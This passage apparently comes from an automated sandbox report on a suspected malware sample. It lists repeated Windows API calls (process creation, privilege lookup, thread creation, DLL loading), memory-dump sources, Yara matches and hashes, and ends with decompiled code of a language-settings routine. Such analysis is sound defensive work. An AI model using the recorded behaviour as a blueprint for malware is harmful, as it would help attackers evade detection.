                                                                                                                                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                    • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                                                                                    • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                    • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 000D6F98
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep
                                                                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 000D6F98
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep
                                                                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(&5,?,000D3C9F,000D3C9F,?,000D3526,?,?,?,?,?,00000000,00000000,?), ref: 000D84CD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                    • String ID: &5
                                                                                                                                                    • API String ID: 1279760036-520183115
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(&5,?,000D3C9F,000D3C9F,?,000D3526,?,?,?,?,?,00000000,00000000,?), ref: 000D84CD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                    • String ID: &5
                                                                                                                                                    • API String ID: 1279760036-520183115
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000C3B93), ref: 000D850D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                    • String ID: .z`
                                                                                                                                                    • API String ID: 3298025750-1441809116
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000C3B93), ref: 000D850D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                    • String ID: .z`
                                                                                                                                                    • API String ID: 3298025750-1441809116
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000C72CA
                                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000C72EB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 000C9BA2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Load
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2234796835-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000D85A4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateInternalProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2186235152-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000D85A4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateInternalProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2186235152-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,000CCFB2,000CCFB2,?,00000000,?,?), ref: 000D8670
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,000CCCE0,?,?), ref: 000D705C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,000CCFB2,000CCFB2,?,00000000,?,?), ref: 000D8670
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,000CCFB2,000CCFB2,?,00000000,?,?), ref: 000D8670
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,000C7C73,?), ref: 000CD44B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,000C7C73,?), ref: 000CD44B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                    			E02048788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				short* _v12;
                                                                                                                                                    				void* _v16;
                                                                                                                                                    				signed int _v20;
                                                                                                                                                    				char _v24;
                                                                                                                                                    				signed int _v28;
                                                                                                                                                    				signed int _v32;
                                                                                                                                                    				char _v36;
                                                                                                                                                    				signed int _v40;
                                                                                                                                                    				char _v44;
                                                                                                                                                    				signed int _v48;
                                                                                                                                                    				signed int _v52;
                                                                                                                                                    				signed int _v56;
                                                                                                                                                    				signed int _v60;
                                                                                                                                                    				char _v68;
                                                                                                                                                    				void* _t216;
                                                                                                                                                    				intOrPtr _t231;
                                                                                                                                                    				short* _t235;
                                                                                                                                                    				intOrPtr _t257;
                                                                                                                                                    				short* _t261;
                                                                                                                                                    				intOrPtr _t284;
                                                                                                                                                    				intOrPtr _t288;
                                                                                                                                                    				void* _t314;
                                                                                                                                                    				signed int _t318;
                                                                                                                                                    				short* _t319;
                                                                                                                                                    				intOrPtr _t321;
                                                                                                                                                    				void* _t328;
                                                                                                                                                    				void* _t329;
                                                                                                                                                    				char* _t332;
                                                                                                                                                    				signed int _t333;
                                                                                                                                                    				signed int* _t334;
                                                                                                                                                    				void* _t335;
                                                                                                                                                    				void* _t338;
                                                                                                                                                    				void* _t339;
                                                                                                                                                    
                                                                                                                                                    				_t328 = __edx;
                                                                                                                                                    				_t322 = __ecx;
                                                                                                                                                    				_t318 = 0;
                                                                                                                                                    				_t334 = _a4;
                                                                                                                                                    				_v8 = 0;
                                                                                                                                                    				_v28 = 0;
                                                                                                                                                    				_v48 = 0;
                                                                                                                                                    				_v20 = 0;
                                                                                                                                                    				_v40 = 0;
                                                                                                                                                    				_v32 = 0;
                                                                                                                                                    				_v52 = 0;
                                                                                                                                                    				if(_t334 == 0) {
                                                                                                                                                    					_t329 = 0xc000000d;
                                                                                                                                                    					L49:
                                                                                                                                                    					_t334[0x11] = _v56;
                                                                                                                                                    					 *_t334 =  *_t334 | 0x00000800;
                                                                                                                                                    					_t334[0x12] = _v60;
                                                                                                                                                    					_t334[0x13] = _v28;
                                                                                                                                                    					_t334[0x17] = _v20;
                                                                                                                                                    					_t334[0x16] = _v48;
                                                                                                                                                    					_t334[0x18] = _v40;
                                                                                                                                                    					_t334[0x14] = _v32;
                                                                                                                                                    					_t334[0x15] = _v52;
                                                                                                                                                    					return _t329;
                                                                                                                                                    				}
                                                                                                                                                    				_v56 = 0;
                                                                                                                                                    				if(E02048460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                    					_v56 = 1;
                                                                                                                                                    					if(_v8 != 0) {
                                                                                                                                                    						_t207 = E0202E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                    					}
                                                                                                                                                    					_push(1);
                                                                                                                                                    					_v8 = _t318;
                                                                                                                                                    					E0204718A(_t207);
                                                                                                                                                    					_t335 = _t335 + 4;
                                                                                                                                                    				}
                                                                                                                                                    				_v60 = _v60 | 0xffffffff;
                                                                                                                                                    				if(E02048460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                    					_t333 =  *_v8;
                                                                                                                                                    					_v60 = _t333;
                                                                                                                                                    					_t314 = E0202E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                    					_push(_t333);
                                                                                                                                                    					_v8 = _t318;
                                                                                                                                                    					E0204718A(_t314);
                                                                                                                                                    					_t335 = _t335 + 4;
                                                                                                                                                    				}
                                                                                                                                                    				_t216 = E02048460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                                                                                                    				_t332 = ";";
                                                                                                                                                    				if(_t216 < 0) {
                                                                                                                                                    					L17:
                                                                                                                                                    					if(E02048460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                    						L30:
                                                                                                                                                    						if(E02048460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                    							L46:
                                                                                                                                                    							_t329 = 0;
                                                                                                                                                    							L47:
                                                                                                                                                    							if(_v8 != _t318) {
                                                                                                                                                    								E0202E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                    							}
                                                                                                                                                    							if(_v28 != _t318) {
                                                                                                                                                    								if(_v20 != _t318) {
                                                                                                                                                    									E0202E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                    									_v20 = _t318;
                                                                                                                                                    									_v40 = _t318;
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    							goto L49;
                                                                                                                                                    						}
                                                                                                                                                    						_t231 = _v24;
                                                                                                                                                    						_t322 = _t231 + 4;
                                                                                                                                                    						_push(_t231);
                                                                                                                                                    						_v52 = _t322;
                                                                                                                                                    						E0204718A(_t231);
                                                                                                                                                    						if(_t322 == _t318) {
                                                                                                                                                    							_v32 = _t318;
                                                                                                                                                    						} else {
                                                                                                                                                    							_v32 = E0202E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                    						}
                                                                                                                                                    						if(_v32 == _t318) {
                                                                                                                                                    							_v52 = _t318;
                                                                                                                                                    							L58:
                                                                                                                                                    							_t329 = 0xc0000017;
                                                                                                                                                    							goto L47;
                                                                                                                                                    						} else {
                                                                                                                                                    							E02022340(_v32, _v8, _v24);
                                                                                                                                                    							_v16 = _v32;
                                                                                                                                                    							_a4 = _t318;
                                                                                                                                                    							_t235 = E0203E679(_v32, _t332);
                                                                                                                                                    							while(1) {
                                                                                                                                                    								_t319 = _t235;
                                                                                                                                                    								if(_t319 == 0) {
                                                                                                                                                    									break;
                                                                                                                                                    								}
                                                                                                                                                    								 *_t319 = 0;
                                                                                                                                                    								_t321 = _t319 + 2;
                                                                                                                                                    								E0202E2A8(_t322,  &_v68, _v16);
                                                                                                                                                    								if(E02045553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                    									_a4 = _a4 + 1;
                                                                                                                                                    								}
                                                                                                                                                    								_v16 = _t321;
                                                                                                                                                    								_t235 = E0203E679(_t321, _t332);
                                                                                                                                                    								_pop(_t322);
                                                                                                                                                    							}
                                                                                                                                                    							_t236 = _v16;
                                                                                                                                                    							if( *_v16 != _t319) {
                                                                                                                                                    								E0202E2A8(_t322,  &_v68, _t236);
                                                                                                                                                    								if(E02045553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                    									_a4 = _a4 + 1;
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    							if(_a4 == 0) {
                                                                                                                                                    								E0202E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                                                                                                    								_v52 = _v52 & 0x00000000;
                                                                                                                                                    								_v32 = _v32 & 0x00000000;
                                                                                                                                                    							}
                                                                                                                                                    							if(_v8 != 0) {
                                                                                                                                                    								E0202E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                    							}
                                                                                                                                                    							_v8 = _v8 & 0x00000000;
                                                                                                                                                    							_t318 = 0;
                                                                                                                                                    							goto L46;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					_t257 = _v24;
                                                                                                                                                    					_t322 = _t257 + 4;
                                                                                                                                                    					_push(_t257);
                                                                                                                                                    					_v40 = _t322;
                                                                                                                                                    					E0204718A(_t257);
                                                                                                                                                    					_t338 = _t335 + 4;
                                                                                                                                                    					if(_t322 == _t318) {
                                                                                                                                                    						_v20 = _t318;
                                                                                                                                                    					} else {
                                                                                                                                                    						_v20 = E0202E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                    					}
                                                                                                                                                    					if(_v20 == _t318) {
                                                                                                                                                    						_v40 = _t318;
                                                                                                                                                    						goto L58;
                                                                                                                                                    					} else {
                                                                                                                                                    						E02022340(_v20, _v8, _v24);
                                                                                                                                                    						_v16 = _v20;
                                                                                                                                                    						_a4 = _t318;
                                                                                                                                                    						_t261 = E0203E679(_v20, _t332);
                                                                                                                                                    						_t335 = _t338 + 0x14;
                                                                                                                                                    						while(1) {
                                                                                                                                                    							_v12 = _t261;
                                                                                                                                                    							if(_t261 == _t318) {
                                                                                                                                                    								break;
                                                                                                                                                    							}
                                                                                                                                                    							_v12 = _v12 + 2;
                                                                                                                                                    							 *_v12 = 0;
                                                                                                                                                    							E0202E2A8(_v12,  &_v68, _v16);
                                                                                                                                                    							if(E02045553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                    								_a4 = _a4 + 1;
                                                                                                                                                    							}
                                                                                                                                                    							_v16 = _v12;
                                                                                                                                                    							_t261 = E0203E679(_v12, _t332);
                                                                                                                                                    							_pop(_t322);
                                                                                                                                                    						}
                                                                                                                                                    						_t269 = _v16;
                                                                                                                                                    						if( *_v16 != _t318) {
                                                                                                                                                    							E0202E2A8(_t322,  &_v68, _t269);
                                                                                                                                                    							if(E02045553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                    								_a4 = _a4 + 1;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						if(_a4 == _t318) {
                                                                                                                                                    							E0202E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                    							_v40 = _t318;
                                                                                                                                                    							_v20 = _t318;
